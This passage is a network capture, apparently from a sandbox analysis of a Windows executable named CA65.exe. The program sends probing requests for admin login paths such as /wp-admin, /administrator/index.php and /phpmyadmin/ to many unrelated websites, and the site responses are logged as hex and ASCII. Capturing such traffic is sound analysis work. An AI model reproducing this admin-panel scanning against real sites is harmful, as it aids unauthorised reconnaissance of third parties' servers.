2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 31 36 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f Data Ascii: s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0.16s;animatio
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 Data Ascii: ;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:0 0 0 1px #5
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f 63 6f 6f 6b 69 65 73 5f 74 79 70 65 22 3a 22 6e 61 Data Ascii: .com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__cookies_type":"na
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 Data Ascii: re that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/administrator/index.php'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you
2023-12-22 20:14:54 UTC	1263	IN	Data Raw: 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 5f 6b 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 Data Ascii: ['ct_sfw_pass_key', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCS
2023-12-22 20:14:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	59170	34.149.87.45	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	238	OUT	GET /wp-admin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.valentinegrowers.com/wp-login.php
2023-12-22 20:14:55 UTC	1086	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276094.97417092992415320256 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:14:55 GMT X-Served-By: cache-dfw-kdfw8210021-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRalsLdlxH3ESa4hzsLe02sXVHCy2enhsqnwoN5tf+FlCmPe/QkHg89F/wEdJNu+hnHLQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,c2NmS8zFFiMMSZsKYWKS96LADve3hkb6YcfzdP1unZI=,WDMzHiyOL7uW518fW2ByrxYm7Hy0IxbPwWPdSZ00JGIuGGyTjOJT2bBDFj9QbaUIfL/RERtnkwYNR6ehP9dODg== Transfer-Encoding: chunked Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:14:55 UTC	166	IN	Data Raw: 32 34 39 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 Data Ascii: 249 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
2023-12-22 20:14:55 UTC	1252	IN	Data Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
2023-12-22 20:14:55 UTC	1252	IN	Data Raw: 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 Data Ascii: com/services/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-publi
2023-12-22 20:14:55 UTC	278	IN	Data Raw: 65 64 20 6f 63 63 75 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a Data Ascii: ed occurred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	59483	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	239	OUT	GET /administrator/index.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://saltdelcolom.com/administrator/
2023-12-22 20:14:56 UTC	542	IN	HTTP/1.1 301 Moved Permanently Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: https://saltdelcolom.com/administrator/ content-length: 0 date: Fri, 22 Dec 2023 20:14:56 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	59247	52.165.155.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	267	OUT	GET /phpmyadmin/ HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:14:54 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:14:55 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	59567	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	187	OUT	GET /administrator/index.php HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	973	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eFDLAntyGiFonKeHvlRcQoX8p4C6BIC1DvkXkwvQZLT8jXVsSJiezN2YVx8g0eRFuWv0zs%2Bnvbziq9wdWLqap3wjjft59Dqia4U5U9RvSY4E24cofR0eDf8SftBGQHrY5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08ab2b522888-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	59587	104.17.71.73	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	397	OUT	GET /admin.php HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=ebabc29efc627a5b6a9e110bfc53f3a0a35a7c92-1703276092; __cf_bm=bH7_BFmSsW2DcDVtTveD3_i_9D7TK7HgfSPQf92uV0U-1703276092-1-ASIQ/9fLSSp4Xni2Hq0D3Lm/qEKWl92BpM2ldUZtH3SMtpBF042WggaCSVKa4e5R99m+VhVlDhD1rXvk1lby0fU= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	281	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:55 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/admin.php Strict-Transport-Security: max-age=31536000 Server: cloudflare CF-RAY: 839b08ab4fa7dab1-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	59458	91.132.253.137	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	179	OUT	GET /index.php HTTP/1.1 Host: flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	533	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:55 GMT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=300 Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.flandria-loisirs.com/index.php/ Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:14:55 GMT X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:55 UTC	430	IN	Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: 1a2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.flandria-loisirs.com/index.php/'" /> <title>Redirecting to https://www.flandria-loisirs.com/index.php/</title>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	59638	141.193.213.10	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	335	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: __cf_bm=zLg0kxbTnzSr2Pc6lQFDuxy7XrRjQlkrNFuKQYEQAL0-1703276093-1-AfpybGM9U8VHIQ6Y0JdzmKmjts1tetyBd2QD/UMXzWTwyLI3BLVT3jcXnR0CRt7cedxvgxdxq6l95mNJ3vQvV2A= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	1362	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:14:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276095; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276095; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522246e7e981acc00a3c35dd0adbd47b5bf%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2FphpMyAdmin%2F%22%3A%5B1703276095%5D%7D; expires=Mon, 25 Dec 2023 20:14:55 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:14:55 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache X-Powered-By: WP Engine X-Cacheable: NO:403 Cache-Control: max-age=0, must-revalidate, private X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 839b08abedf39ab3-MIA
2023-12-22 20:14:55 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 31 66 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1f98<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 31 36 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f Data Ascii: s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0.16s;animatio
